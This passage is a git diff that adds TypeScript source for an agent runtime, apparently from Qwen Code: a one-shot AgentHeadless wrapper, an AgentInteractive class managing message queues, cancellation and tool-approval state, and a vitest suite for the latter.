b/packages/core/src/agents/runtime/agent-headless.ts @@ -0,0 +1,360 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentHeadless — one-shot task execution wrapper around AgentCore. + * + * AgentHeadless manages + * the lifecycle of a single headless task: start → run → finish. + * It delegates all model reasoning and tool scheduling to AgentCore. + * + * For persistent interactive agents, see AgentInteractive (Phase 2). + */ + +import type { Config } from '../../config/config.js'; +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { + AgentEventEmitter, + AgentStartEvent, + AgentErrorEvent, + AgentFinishEvent, + AgentHooks, +} from './agent-events.js'; +import { AgentEventType } from './agent-events.js'; +import type { AgentStatsSummary } from './agent-statistics.js'; +import type { + PromptConfig, + ModelConfig, + RunConfig, + ToolConfig, +} from './agent-types.js'; +import { AgentTerminateMode } from './agent-types.js'; +import { logSubagentExecution } from '../../telemetry/loggers.js'; +import { SubagentExecutionEvent } from '../../telemetry/types.js'; +import { AgentCore } from './agent-core.js'; +import { DEFAULT_QWEN_MODEL } from '../../config/models.js'; + +const debugLogger = createDebugLogger('SUBAGENT'); + +// ─── Utilities (unchanged, re-exported for consumers) ──────── + +/** + * Manages the runtime context state for the subagent. + * This class provides a mechanism to store and retrieve key-value pairs + * that represent the dynamic state and variables accessible to the subagent + * during its execution. + */ +export class ContextState { + private state: Record = {}; + + /** + * Retrieves a value from the context state. + * + * @param key - The key of the value to retrieve. + * @returns The value associated with the key, or undefined if the key is not found. + */ + get(key: string): unknown { + return this.state[key]; + } + + /** + * Sets a value in the context state. + * + * @param key - The key to set the value under. + * @param value - The value to set. + */ + set(key: string, value: unknown): void { + this.state[key] = value; + } + + /** + * Retrieves all keys in the context state. + * + * @returns An array of all keys in the context state. + */ + get_keys(): string[] { + return Object.keys(this.state); + } +} + +/** + * Replaces `${...}` placeholders in a template string with values from a context. + * + * This function identifies all placeholders in the format `${key}`, validates that + * each key exists in the provided `ContextState`, and then performs the substitution. + * + * @param template The template string containing placeholders. + * @param context The `ContextState` object providing placeholder values. + * @returns The populated string with all placeholders replaced. + * @throws {Error} if any placeholder key is not found in the context. + */ +export function templateString( + template: string, + context: ContextState, +): string { + const placeholderRegex = /\$\{(\w+)\}/g; + + // First, find all unique keys required by the template. + const requiredKeys = new Set( + Array.from(template.matchAll(placeholderRegex), (match) => match[1]), + ); + + // Check if all required keys exist in the context. + const contextKeys = new Set(context.get_keys()); + const missingKeys = Array.from(requiredKeys).filter( + (key) => !contextKeys.has(key), + ); + + if (missingKeys.length > 0) { + throw new Error( + `Missing context values for the following keys: ${missingKeys.join( + ', ', + )}`, + ); + } + + // Perform the replacement using a replacer function. + return template.replace(placeholderRegex, (_match, key) => + String(context.get(key)), + ); +} + +// ─── AgentHeadless ────────────────────────────────────────── + +/** + * AgentHeadless — one-shot task executor. + * + * Takes a task, runs it through AgentCore's reasoning loop, and returns + * the result. + * + * Lifecycle: Born → execute() → die. + */ +export class AgentHeadless { + private readonly core: AgentCore; + private finalText: string = ''; + private terminateMode: AgentTerminateMode = AgentTerminateMode.ERROR; + + private constructor(core: AgentCore) { + this.core = core; + } + + /** + * Creates a new AgentHeadless instance. + * + * @param name - The name for the subagent, used for logging and identification. + * @param runtimeContext - The shared runtime configuration and services. + * @param promptConfig - Configuration for the subagent's prompt and behavior. + * @param modelConfig - Configuration for the generative model parameters. + * @param runConfig - Configuration for the subagent's execution environment. + * @param toolConfig - Optional configuration for tools available to the subagent. + * @param eventEmitter - Optional event emitter for streaming events to UI. + * @param hooks - Optional lifecycle hooks. + */ + static async create( + name: string, + runtimeContext: Config, + promptConfig: PromptConfig, + modelConfig: ModelConfig, + runConfig: RunConfig, + toolConfig?: ToolConfig, + eventEmitter?: AgentEventEmitter, + hooks?: AgentHooks, + ): Promise { + const core = new AgentCore( + name, + runtimeContext, + promptConfig, + modelConfig, + runConfig, + toolConfig, + eventEmitter, + hooks, + ); + return new AgentHeadless(core); + } + + /** + * Executes the task in headless mode. + * + * This method orchestrates the subagent's execution lifecycle: + * 1. Creates a chat session + * 2. Prepares tools + * 3. Runs the reasoning loop until completion/termination + * 4. Emits start/finish/error events + * 5. Records telemetry + * + * @param context - The current context state containing variables for prompt templating. + * @param externalSignal - Optional abort signal for external cancellation. + */ + async execute( + context: ContextState, + externalSignal?: AbortSignal, + ): Promise { + const chat = await this.core.createChat(context); + + if (!chat) { + this.terminateMode = AgentTerminateMode.ERROR; + return; + } + + // Set up abort signal propagation + const abortController = new AbortController(); + const onExternalAbort = () => { + abortController.abort(); + }; + if (externalSignal) { + externalSignal.addEventListener('abort', onExternalAbort); + } + if (externalSignal?.aborted) { + abortController.abort(); + } + + const toolsList = this.core.prepareTools(); + + const initialTaskText = String( + (context.get('task_prompt') as string) ?? 'Get Started!', + ); + const initialMessages = [ + { role: 'user' as const, parts: [{ text: initialTaskText }] }, + ]; + + const startTime = Date.now(); + this.core.executionStats.startTimeMs = startTime; + this.core.stats.start(startTime); + + try { + // Emit start event + this.core.eventEmitter?.emit(AgentEventType.START, { + subagentId: this.core.subagentId, + name: this.core.name, + model: + this.core.modelConfig.model || + this.core.runtimeContext.getModel() || + DEFAULT_QWEN_MODEL, + tools: (this.core.toolConfig?.tools || ['*']).map((t) => + typeof t === 'string' ? t : t.name, + ), + timestamp: Date.now(), + } as AgentStartEvent); + + // Log telemetry for subagent start + const startEvent = new SubagentExecutionEvent(this.core.name, 'started'); + logSubagentExecution(this.core.runtimeContext, startEvent); + + // Delegate to AgentCore's reasoning loop + const result = await this.core.runReasoningLoop( + chat, + initialMessages, + toolsList, + abortController, + { + maxTurns: this.core.runConfig.max_turns, + maxTimeMinutes: this.core.runConfig.max_time_minutes, + startTimeMs: startTime, + }, + ); + + this.finalText = result.text; + this.terminateMode = result.terminateMode ?? AgentTerminateMode.GOAL; + } catch (error) { + debugLogger.error('Error during subagent execution:', error); + this.terminateMode = AgentTerminateMode.ERROR; + this.core.eventEmitter?.emit(AgentEventType.ERROR, { + subagentId: this.core.subagentId, + error: error instanceof Error ? error.message : String(error), + timestamp: Date.now(), + } as AgentErrorEvent); + + throw error; + } finally { + if (externalSignal) { + externalSignal.removeEventListener('abort', onExternalAbort); + } + this.core.executionStats.totalDurationMs = Date.now() - startTime; + const summary = this.core.stats.getSummary(Date.now()); + this.core.eventEmitter?.emit(AgentEventType.FINISH, { + subagentId: this.core.subagentId, + terminateReason: this.terminateMode, + timestamp: Date.now(), + rounds: summary.rounds, + totalDurationMs: summary.totalDurationMs, + totalToolCalls: summary.totalToolCalls, + successfulToolCalls: summary.successfulToolCalls, + failedToolCalls: summary.failedToolCalls, + inputTokens: summary.inputTokens, + outputTokens: summary.outputTokens, + totalTokens: summary.totalTokens, + } as AgentFinishEvent); + + const completionEvent = new SubagentExecutionEvent( + this.core.name, + this.terminateMode === AgentTerminateMode.GOAL ? 'completed' : 'failed', + { + terminate_reason: this.terminateMode, + result: this.finalText, + execution_summary: this.core.stats.formatCompact( + 'Subagent execution completed', + ), + }, + ); + logSubagentExecution(this.core.runtimeContext, completionEvent); + + await this.core.hooks?.onStop?.({ + subagentId: this.core.subagentId, + name: this.core.name, + terminateReason: this.terminateMode, + summary: summary as unknown as Record, + timestamp: Date.now(), + }); + } + } + + // ─── Accessors ───────────────────────────────────────────── + + /** + * Provides access to the underlying AgentCore for advanced use cases. + * Used by AgentInteractive and InProcessBackend. + */ + getCore(): AgentCore { + return this.core; + } + + get executionStats() { + return this.core.executionStats; + } + + set executionStats(value) { + this.core.executionStats = value; + } + + getEventEmitter() { + return this.core.getEventEmitter(); + } + + getStatistics() { + return this.core.getStatistics(); + } + + getExecutionSummary(): AgentStatsSummary { + return this.core.getExecutionSummary(); + } + + getFinalText(): string { + return this.finalText; + } + + getTerminateMode(): AgentTerminateMode { + return this.terminateMode; + } + + get name(): string { + return this.core.name; + } + + get runtimeContext(): Config { + return this.core.runtimeContext; + } +} diff --git a/packages/core/src/agents/runtime/agent-interactive.test.ts b/packages/core/src/agents/runtime/agent-interactive.test.ts new file mode 100644 index 000000000..5560b665f --- /dev/null +++ b/packages/core/src/agents/runtime/agent-interactive.test.ts @@ -0,0 +1,620 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { AgentInteractive } from './agent-interactive.js'; +import type { AgentCore } from './agent-core.js'; +import { AgentEventEmitter, AgentEventType } from './agent-events.js'; +import { ContextState } from './agent-headless.js'; +import type { AgentInteractiveConfig } from './agent-types.js'; +import { AgentStatus } from './agent-types.js'; + +function createMockChat() { + return { + sendMessageStream: vi.fn(), + }; +} + +function createMockCore( + overrides: { + chatValue?: unknown; + nullChat?: boolean; + loopResult?: { text: string; terminateMode: null; turnsUsed: number }; + } = {}, +) { + const emitter = new AgentEventEmitter(); + const chatReturnValue = overrides.nullChat + ? undefined + : overrides.chatValue !== undefined + ? overrides.chatValue + : createMockChat(); + const core = { + subagentId: 'test-agent-abc123', + name: 'test-agent', + eventEmitter: emitter, + stats: { + start: vi.fn(), + getSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 100, + totalToolCalls: 0, + successfulToolCalls: 0, + failedToolCalls: 0, + inputTokens: 0, + outputTokens: 0, + totalTokens: 0, + }), + setRounds: vi.fn(), + recordToolCall: vi.fn(), + recordTokens: vi.fn(), + }, + createChat: vi.fn().mockResolvedValue(chatReturnValue), + prepareTools: vi.fn().mockReturnValue([]), + runReasoningLoop: vi.fn().mockResolvedValue( + overrides.loopResult ?? { + text: 'Done', + terminateMode: null, + turnsUsed: 1, + }, + ), + getEventEmitter: () => emitter, + getExecutionSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 100, + totalToolCalls: 0, + successfulToolCalls: 0, + failedToolCalls: 0, + inputTokens: 0, + outputTokens: 0, + totalTokens: 0, + }), + } as unknown as AgentCore; + + return { core, emitter }; +} + +function createConfig( + overrides: Partial = {}, +): AgentInteractiveConfig { + return { + agentId: 'agent-1', + agentName: 'Test Agent', + ...overrides, + }; +} + +describe('AgentInteractive', () => { + let context: ContextState; + + beforeEach(() => { + context = new ContextState(); + }); + + // ─── Lifecycle ────────────────────────────────────────────── + + it('should initialize and complete cleanly without initialTask', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + // No initialTask → agent is waiting on queue, status is still initializing. + // Shutdown drains queue, loop exits normally → completed. + await agent.shutdown(); + expect(agent.getStatus()).toBe('completed'); + }); + + it('should process initialTask immediately on start', async () => { + const { core } = createMockCore(); + const config = createConfig({ initialTask: 'Do something' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + expect(core.runReasoningLoop).toHaveBeenCalledOnce(); + expect(agent.getMessages().length).toBeGreaterThan(0); + expect(agent.getMessages()[0]?.role).toBe('user'); + expect(agent.getMessages()[0]?.content).toBe('Do something'); + + await agent.shutdown(); + expect(agent.getStatus()).toBe('completed'); + }); + + it('should process enqueued messages', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + agent.enqueueMessage('Hello'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + expect(core.runReasoningLoop).toHaveBeenCalledOnce(); + + await agent.shutdown(); + }); + + it('should set status to failed when chat creation fails', async () => { + const { core } = createMockCore({ nullChat: true }); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + expect(agent.getStatus()).toBe('failed'); + expect(agent.getError()).toBe('Failed to create chat session'); + }); + + // ─── Error Recovery ──────────────────────────────────────── + + it('should survive round errors and recover', async () => { + const { core } = createMockCore(); + + let callCount = 0; + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + callCount++; + if (callCount === 1) { + return Promise.reject(new Error('Model error')); + } + return Promise.resolve({ + text: 'Recovered', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + agent.enqueueMessage('cause error'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('failed'); + expect(callCount).toBe(1); + }); + + // Error recorded as info message with error level + const messages = agent.getMessages(); + const errorMsg = messages.find( + (m) => + m.role === 'info' && + m.content.includes('Model error') && + m.metadata?.['level'] === 'error', + ); + expect(errorMsg).toBeDefined(); + + // Second message works fine + agent.enqueueMessage('recover'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + expect(callCount).toBe(2); + }); + + await agent.shutdown(); + }); + + // ─── Cancellation ────────────────────────────────────────── + + it('should cancel current round without killing the agent', async () => { + const { core } = createMockCore(); + let resolveLoop: () => void; + (core.runReasoningLoop as ReturnType).mockImplementation( + () => + new Promise<{ text: string; terminateMode: string; turnsUsed: number }>( + (resolve) => { + resolveLoop = () => + resolve({ text: '', terminateMode: 'cancelled', turnsUsed: 0 }); + }, + ), + ); + + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + agent.enqueueMessage('long task'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('running'); + }); + + agent.cancelCurrentRound(); + resolveLoop!(); + + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + await agent.shutdown(); + }); + + it('should abort immediately', async () => { + const { core } = createMockCore(); + (core.runReasoningLoop as ReturnType).mockImplementation( + () => + new Promise((resolve) => { + setTimeout( + () => + resolve({ + text: '', + terminateMode: 'cancelled', + turnsUsed: 0, + }), + 50, + ); + }), + ); + + const config = createConfig({ initialTask: 'long task' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + agent.abort(); + + await agent.waitForCompletion(); + expect(agent.getStatus()).toBe('cancelled'); + }); + + // ─── Accessors ───────────────────────────────────────────── + + it('should provide stats via getStats()', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + const stats = agent.getStats(); + expect(stats).toBeDefined(); + expect(stats.rounds).toBe(1); + }); + + it('should provide core via getCore()', () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + expect(agent.getCore()).toBe(core); + }); + + // ─── Message Recording ───────────────────────────────────── + + it('should record assistant text from ROUND_TEXT events', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'Hello from round', + thoughtText: '', + timestamp: Date.now(), + }); + return Promise.resolve({ + text: 'Hello from round', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'test' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const assistantMsgs = agent + .getMessages() + .filter((m) => m.role === 'assistant' && !m.thought); + expect(assistantMsgs).toHaveLength(1); + expect(assistantMsgs[0]?.content).toBe('Hello from round'); + + await agent.shutdown(); + }); + + it('should not cross-contaminate text across messages', async () => { + const { core, emitter } = createMockCore(); + + let runCount = 0; + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + runCount++; + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: `response-${runCount}`, + thoughtText: '', + timestamp: Date.now(), + }); + return Promise.resolve({ + text: `response-${runCount}`, + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'first message' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + agent.enqueueMessage('second message'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + expect(runCount).toBe(2); + }); + + const messages = agent.getMessages(); + const assistantMessages = messages.filter( + (m) => m.role === 'assistant' && !m.thought, + ); + const corrupted = assistantMessages.find( + (m) => + m.content.includes('response-1') && m.content.includes('response-2'), + ); + expect(corrupted).toBeUndefined(); + + await agent.shutdown(); + }); + + it('should capture thinking text as assistant messages with thought=true', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'Here is the answer', + thoughtText: 'Let me think...', + timestamp: Date.now(), + }); + return Promise.resolve({ + text: 'Here is the answer', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'think about this' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const messages = agent.getMessages(); + const thoughtMsg = messages.find( + (m) => m.role === 'assistant' && m.thought === true, + ); + const textMsg = messages.find((m) => m.role === 'assistant' && !m.thought); + + expect(thoughtMsg).toBeDefined(); + expect(thoughtMsg?.content).toBe('Let me think...'); + expect(textMsg).toBeDefined(); + expect(textMsg?.content).toBe('Here is the answer'); + + await agent.shutdown(); + }); + + it('should record tool_call and tool_result with correct roles', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'I will read the file', + thoughtText: '', + timestamp: Date.now(), + }); + emitter.emit(AgentEventType.TOOL_CALL, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + args: { path: 'test.ts' }, + description: 'Read test.ts', + timestamp: Date.now(), + }); + emitter.emit(AgentEventType.TOOL_RESULT, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + success: true, + timestamp: Date.now(), + }); + return Promise.resolve({ + text: '', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'read a file' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const messages = agent.getMessages(); + const toolCall = messages.find((m) => m.role === 'tool_call'); + const toolResult = messages.find((m) => m.role === 'tool_result'); + + expect(toolCall).toBeDefined(); + expect(toolCall?.metadata?.['toolName']).toBe('read_file'); + expect(toolCall?.metadata?.['callId']).toBe('call-1'); + + expect(toolResult).toBeDefined(); + expect(toolResult?.metadata?.['success']).toBe(true); + + await agent.shutdown(); + }); + + it('should place text before tool_call to preserve temporal ordering', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'Let me check', + thoughtText: '', + timestamp: Date.now(), + }); + emitter.emit(AgentEventType.TOOL_CALL, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + args: {}, + description: '', + timestamp: Date.now(), + }); + emitter.emit(AgentEventType.TOOL_RESULT, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + success: true, + timestamp: Date.now(), + }); + return Promise.resolve({ + text: '', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'task' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const messages = agent.getMessages(); + const nonUser = messages.filter((m) => m.role !== 'user'); + + const textIdx = nonUser.findIndex( + (m) => m.role === 'assistant' && m.content === 'Let me check', + ); + const toolIdx = nonUser.findIndex((m) => m.role === 'tool_call'); + expect(textIdx).toBeLessThan(toolIdx); + + await agent.shutdown(); + }); + + // ─── Chat History ──────────────────────────────────────────── + + it('should pass chatHistory as extraHistory to createChat', async () => { + const { core } = createMockCore(); + const chatHistory = [ + { role: 'user' as const, parts: [{ text: 'earlier question' }] }, + { role: 'model' as const, parts: [{ text: 'earlier answer' }] }, + ]; + const config = createConfig({ chatHistory }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + expect(core.createChat).toHaveBeenCalledWith(context, { + interactive: true, + extraHistory: chatHistory, + }); + + await agent.shutdown(); + }); + + it('should add info message when chatHistory is present', async () => { + const { core } = createMockCore(); + const chatHistory = [ + { role: 'user' as const, parts: [{ text: 'earlier question' }] }, + { role: 'model' as const, parts: [{ text: 'earlier answer' }] }, + ]; + const agent = new AgentInteractive(createConfig({ chatHistory }), core); + + await agent.start(context); + + const messages = agent.getMessages(); + expect(messages).toHaveLength(1); + expect(messages[0]).toMatchObject({ + role: 'info', + content: 'History context from parent session included (2 messages)', + }); + + await agent.shutdown(); + }); + + it('should not add info message when chatHistory is absent', async () => { + const { core } = createMockCore(); + const agent = new AgentInteractive(createConfig(), core); + + await agent.start(context); + + expect(agent.getMessages()).toHaveLength(0); + + await agent.shutdown(); + }); + + it('should pass undefined extraHistory when chatHistory is not set', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + expect(core.createChat).toHaveBeenCalledWith(context, { + interactive: true, + extraHistory: undefined, + }); + + await agent.shutdown(); + }); + + // ─── Events ──────────────────────────────────────────────── + + it('should emit status_change events', async () => { + const { core, emitter } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + const statuses: AgentStatus[] = []; + emitter.on(AgentEventType.STATUS_CHANGE, (payload) => { + statuses.push(payload.newStatus); + }); + + await agent.start(context); + await agent.shutdown(); + + expect(statuses).toContain(AgentStatus.COMPLETED); + }); +}); diff --git a/packages/core/src/agents/runtime/agent-interactive.ts b/packages/core/src/agents/runtime/agent-interactive.ts new file mode 100644 index 000000000..42e9dedce --- /dev/null +++ b/packages/core/src/agents/runtime/agent-interactive.ts @@ -0,0 +1,512 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentInteractive — persistent interactive agent. + * + * Composes AgentCore with on-demand message processing. Builds conversation + * state (messages, pending approvals, live outputs) that the UI reads. + */ + +import { createDebugLogger } from '../../utils/debugLogger.js'; +import { type AgentEventEmitter, AgentEventType } from './agent-events.js'; +import type { + AgentRoundTextEvent, + AgentToolCallEvent, + AgentToolResultEvent, + AgentToolOutputUpdateEvent, + AgentApprovalRequestEvent, +} from './agent-events.js'; +import type { AgentStatsSummary } from './agent-statistics.js'; +import type { AgentCore } from './agent-core.js'; +import type { ContextState } from './agent-headless.js'; +import type { GeminiChat } from '../../core/geminiChat.js'; +import type { FunctionDeclaration } from '@google/genai'; +import { + ToolConfirmationOutcome, + type ToolCallConfirmationDetails, + type ToolResultDisplay, +} from '../../tools/tools.js'; +import { AsyncMessageQueue } from '../../utils/asyncMessageQueue.js'; +import { + AgentTerminateMode, + AgentStatus, + isTerminalStatus, + type AgentInteractiveConfig, + type AgentMessage, +} from './agent-types.js'; + +const debugLogger = createDebugLogger('AGENT_INTERACTIVE'); + +/** + * AgentInteractive — persistent interactive agent that processes + * messages on demand. + * + * Three-level cancellation: + * - `cancelCurrentRound()` — abort the current reasoning loop only + * - `shutdown()` — graceful: stop accepting messages, wait for cycle + * - `abort()` — immediate: master abort, set cancelled + */ +export class AgentInteractive { + readonly config: AgentInteractiveConfig; + private readonly core: AgentCore; + private readonly queue = new AsyncMessageQueue(); + private readonly messages: AgentMessage[] = []; + + private status: AgentStatus = AgentStatus.INITIALIZING; + private error: string | undefined; + private lastRoundError: string | undefined; + private executionPromise: Promise | undefined; + private masterAbortController = new AbortController(); + private roundAbortController: AbortController | undefined; + private chat: GeminiChat | undefined; + private toolsList: FunctionDeclaration[] = []; + private processing = false; + private roundCancelledByUser = false; + + // Pending tool approval requests. Keyed by callId. + // Populated by TOOL_WAITING_APPROVAL, removed by TOOL_RESULT or when + // the user responds. The UI reads this to show confirmation dialogs. + private readonly pendingApprovals = new Map< + string, + ToolCallConfirmationDetails + >(); + + // Live streaming output for currently-executing tools. Keyed by callId. + // Populated by TOOL_OUTPUT_UPDATE (replaces previous), cleared on TOOL_RESULT. + // The UI reads this via getLiveOutputs() to show real-time stdout. + private readonly liveOutputs = new Map(); + + // PTY PIDs for currently-executing shell tools. Keyed by callId. + // Populated by TOOL_OUTPUT_UPDATE when pid is present, cleared on TOOL_RESULT. + // The UI reads this via getShellPids() to enable interactive shell input. + private readonly shellPids = new Map(); + + constructor(config: AgentInteractiveConfig, core: AgentCore) { + this.config = config; + this.core = core; + this.setupEventListeners(); + } + + // ─── Lifecycle ────────────────────────────────────────────── + + /** + * Start the agent. Initializes the chat session, then kicks off + * processing if an initialTask is configured. + */ + async start(context: ContextState): Promise { + this.setStatus(AgentStatus.INITIALIZING); + + this.chat = await this.core.createChat(context, { + interactive: true, + extraHistory: this.config.chatHistory, + }); + if (!this.chat) { + this.error = 'Failed to create chat session'; + this.setStatus(AgentStatus.FAILED); + return; + } + + this.toolsList = this.core.prepareTools(); + this.core.stats.start(Date.now()); + + if (this.config.chatHistory?.length) { + this.addMessage( + 'info', + `History context from parent session included (${this.config.chatHistory.length} messages)`, + ); + } + + if (this.config.initialTask) { + this.queue.enqueue(this.config.initialTask); + this.executionPromise = this.runLoop(); + } + } + + /** + * Run loop: process all pending messages, then settle status. + * Exits when the queue is empty or the agent is aborted. + */ + private async runLoop(): Promise { + this.processing = true; + try { + let message = this.queue.dequeue(); + while (message !== null && !this.masterAbortController.signal.aborted) { + this.addMessage('user', message); + await this.runOneRound(message); + message = this.queue.dequeue(); + } + + if (this.masterAbortController.signal.aborted) { + this.setStatus(AgentStatus.CANCELLED); + } else { + this.settleRoundStatus(); + } + } catch (err) { + this.error = err instanceof Error ? err.message : String(err); + this.setStatus(AgentStatus.FAILED); + debugLogger.error('AgentInteractive processing failed:', err); + } finally { + this.processing = false; + } + } + + /** + * Run a single reasoning round for one message. + * Creates a per-round AbortController so cancellation is scoped. + */ + private async runOneRound(message: string): Promise { + if (!this.chat) return; + + this.setStatus(AgentStatus.RUNNING); + this.lastRoundError = undefined; + this.roundCancelledByUser = false; + this.roundAbortController = new AbortController(); + + // Propagate master abort to round + const onMasterAbort = () => this.roundAbortController?.abort(); + this.masterAbortController.signal.addEventListener('abort', onMasterAbort); + if (this.masterAbortController.signal.aborted) { + this.roundAbortController.abort(); + } + + try { + const initialMessages = [ + { role: 'user' as const, parts: [{ text: message }] }, + ]; + + const result = await this.core.runReasoningLoop( + this.chat, + initialMessages, + this.toolsList, + this.roundAbortController, + { + maxTurns: this.config.maxTurnsPerMessage, + maxTimeMinutes: this.config.maxTimeMinutesPerMessage, + }, + ); + + // Surface non-normal termination as a visible info message and as + // lastRoundError so Arena can distinguish limit stops from successes. + if ( + result.terminateMode && + result.terminateMode !== AgentTerminateMode.GOAL + ) { + const msg = terminateModeMessage(result.terminateMode); + if (msg) { + this.addMessage('info', msg.text, { metadata: { level: msg.level } }); + } + this.lastRoundError = `Terminated: ${result.terminateMode}`; + } + } catch (err) { + // User-initiated cancellation already logged by cancelCurrentRound(). + if (this.roundCancelledByUser) return; + // Agent survives round errors — log and settle status in runLoop. + const errorMessage = err instanceof Error ? err.message : String(err); + this.lastRoundError = errorMessage; + debugLogger.error('AgentInteractive round error:', err); + this.addMessage('info', errorMessage, { metadata: { level: 'error' } }); + } finally { + this.masterAbortController.signal.removeEventListener( + 'abort', + onMasterAbort, + ); + this.roundAbortController = undefined; + } + } + + // ─── Cancellation ────────────────────────────────────────── + + /** + * Cancel only the current reasoning round. + * Adds a visible "cancelled" info message and clears pending approvals. + */ + cancelCurrentRound(): void { + this.roundCancelledByUser = true; + this.roundAbortController?.abort(); + this.pendingApprovals.clear(); + this.addMessage('info', 'Agent round cancelled.', { + metadata: { level: 'warning' }, + }); + } + + /** + * Graceful shutdown: stop accepting messages and wait for current + * processing to finish. + */ + async shutdown(): Promise { + this.queue.drain(); + if (this.executionPromise) { + await this.executionPromise; + } + // If no processing cycle ever ran (no initialTask, no messages), + // ensure the agent reaches a terminal status. + if (!isTerminalStatus(this.status)) { + this.setStatus(AgentStatus.COMPLETED); + } + } + + /** + * Immediate abort: cancel everything and set status to cancelled. + */ + abort(): void { + this.masterAbortController.abort(); + this.queue.drain(); + this.pendingApprovals.clear(); + } + + // ─── Message Queue ───────────────────────────────────────── + + /** + * Enqueue a message for the agent to process. + */ + enqueueMessage(message: string): void { + this.queue.enqueue(message); + if (!this.processing) { + this.executionPromise = this.runLoop(); + } + } + + // ─── State Accessors ─────────────────────────────────────── + + getMessages(): readonly AgentMessage[] { + return this.messages; + } + + getStatus(): AgentStatus { + return this.status; + } + + getError(): string | undefined { + return this.error; + } + + getLastRoundError(): string | undefined { + return this.lastRoundError; + } + + getStats(): AgentStatsSummary { + return this.core.getExecutionSummary(); + } + + /** The prompt token count from the most recent model call. */ + getLastPromptTokenCount(): number { + return this.core.lastPromptTokenCount; + } + + getCore(): AgentCore { + return this.core; + } + + getEventEmitter(): AgentEventEmitter | undefined { + return this.core.getEventEmitter(); + } + + /** + * Returns tool calls currently awaiting user approval. + * Keyed by callId → full ToolCallConfirmationDetails (with onConfirm). + * The UI reads this to render confirmation dialogs inside ToolGroupMessage. + */ + getPendingApprovals(): ReadonlyMap { + return this.pendingApprovals; + } + + /** + * Returns live output for currently-executing tools. + * Keyed by callId → latest ToolResultDisplay (replaces on each update). + * Entries are cleared when TOOL_RESULT arrives for the call. + */ + getLiveOutputs(): ReadonlyMap { + return this.liveOutputs; + } + + /** + * Returns PTY PIDs for currently-executing interactive shell tools. + * Keyed by callId → PID. Populated from TOOL_OUTPUT_UPDATE when pid is + * present; cleared when TOOL_RESULT arrives. The UI uses this to enable + * interactive shell input via HistoryItemDisplay's activeShellPtyId prop. + */ + getShellPids(): ReadonlyMap { + return this.shellPids; + } + + /** + * Wait for 